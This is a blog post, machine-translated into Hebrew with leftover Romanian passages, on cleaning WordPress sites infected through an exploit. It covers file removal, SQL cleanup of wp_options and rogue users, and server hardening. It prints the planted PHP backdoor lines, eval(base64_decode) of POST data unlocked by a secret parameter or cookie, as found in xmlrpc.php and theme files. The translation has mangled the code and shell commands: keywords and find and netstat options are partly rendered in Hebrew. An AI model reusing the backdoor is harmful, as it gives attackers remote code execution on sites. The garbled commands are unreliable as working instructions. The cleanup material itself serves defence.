לפני שתקראו את הפוסט הזה, אתם חייבים לראות הפוסט כאן, להבין משהו. :)
מצאתי במספר קבצים של הבלוגים באתר stealthsettings.com, קודים דומים לאלה למטה, שהופיעו כתוצאה מהידבקות ב ניצול של וורדפרס.:
<?php if($_GET[‘573abcb060974771’]==”8e96d1b4b674e1d2″){ eval(base64_decode($_POST['קובץ'])); יְצִיאָה; } ?>
וכן
<?php if($_COOKIE['44e827f9fbeca184′]==”5cd3c94b4b1c57ea”){ eval(base64_decode($_POST['קובץ'])); יְצִיאָה; } ?>
במקרה שלמעלה, מדובר בקובץ xmlrpc.php של מְנוּמנָם, אבל באחד grep בשרת, ניתן לראות שיש די הרבה קודים מהסוג הזה במקורות.
ניקוי קבצים נגועים:
אווקקקיוק
1. הפתרון הטוב ביותר, לאחר שהוא נעשה גיבוי-ul si curatata baza de date, este sa לִמְחוֹק fisierele de וורדפרס (puteti pastra wp-config.php si fisierele care nu tin strict de platforma wp, dupa ce sunt atent verificate) de pe server si sa faceti upload la cele originale din versiunea 2.5.1 (cu ocazia asta faceti si un upgrade de versiune wp :) ): http://wordpress.org/download/ . Stergeti inclusiv fisierele temei, daca nu aveti incredere ca puteti face o verificare atenta a lor.
Se vede ca au fost afectate si fisiere ale temelor care nu au fost folosite niciodata pe blog si simpla schimbare a temei, nu rezolva aceasta problema.
./andreea/wp-content/themes/default/index.php:<?php if($_COOKIE['44e827f9fbeca184′]==”5cd3c94b4b1c57ea”){ eval(base64_decode($_POST['קובץ'])); יְצִיאָה; } ?><? php get_header (); ?>
2. Cautati si stergeti toate fisierele care contin : *_new.php, *_old.php, *.jpgg, *.giff, *.pngg si fisierul wp-info.txt, daca exista.
find . -name “*_new.php”
find . -name “*_old.php”
find . -name “*.jpgg”
find . -name “*_giff”
find . -name “*_pngg”
find . -name “wp-info.txt”
3. ב /tmp , חפש ומחק תיקיות כמו tmpYwbzT2
ניקוי SQL :
1. בטבלה הטבלה wp_options בדוק אם זה קיים ומחק את השורות: intern_links_cache- rss_f541b3abd05e7962fcab37737f40fad8 וכן wordpress_optionsו
2. גם ב-wp_options, עבור אל active_plugins ולמחוק, אם יש כזה, תוסף שמסתיים באחת מההרחבות *_new.php, *_old.php, *.jpgg, *.giff, *.pngg או אם מדובר בתוסף חשוד אחר, בדקו היטב.
3. בטבלה WP_USERS, ראה אם יש משתמש שלא כתוב דבר מימינו, בעמודה user_nicename. מחק את המשתמש הזה, אך זכור את המספר בעמודת המזהה. סביר להניח שמשתמש זה ישתמש ב-"WordPress" בתור user_login ונראה שהוא נוצר בתאריך 00:00:00 0000-00-00.
4. לכו לשולחן wp_usermeta ולמחוק את כל השורות השייכות למזהה למעלה.
לאחר ביצוע ניקוי SQL זה, השבת ולאחר מכן הפעל תוסף כלשהו. (בבלוג -> לוח מחוונים -> פלאגינים)
אבטחת שרת:
1. ראה אילו ספריות וקבצים הם "ניתן לכתיבה” (chmod 777) ונסה לשים א צ'מוד שלא יאפשר יותר את כתיבתם בשום רמה. (chmod 644 למשל)
מצא. -פרם -2 –LS
2. ראה אילו קבצים מגדירים את הביט דָרוֹם אוֹ לְהַחלִיק עַל מִחלָקַיִם . אם אתה לא משתמש בקבצים האלה, הכנס אותם chmod 0 או הסר את החבילה המכילה אותם. הם מאוד מסוכנים, כי הם מוציאים להורג עם הרשאות"קְבוּצָה"או"שׁוֹרֶשׁ" ולא עם ההרשאות של המשתמש הרגיל שמבצע את הקובץ הזה.
מצא / -סוג f -perm -04000 -ls
מצא / -סוג f -perm -02000 -ls
3. בדקו אילו יציאות פתוחות ונסו לסגור או לאבטח את אלו שאינן בשימוש.
netstat -an | רשימת grep -i
זה בערך. אני רואה את זה חלק מהבלוגים אסורים מאת חיפוש Google ואחרים אומרים "כל הכבוד!!!" . טוב, הייתי עושה את זה בשבילם... אבל מה אתם אומרים אם גוגל תתחיל לאסור כל האתרים מי עושה אני שולח ספאם ואורז סוסים טרויאנים (Trojan.Clicker.HTML) בעוגיות?
1 חשב על "ניצול וורדפרס – ניקוי קבצי וירוסים, SQL ואבטחת שרתים.”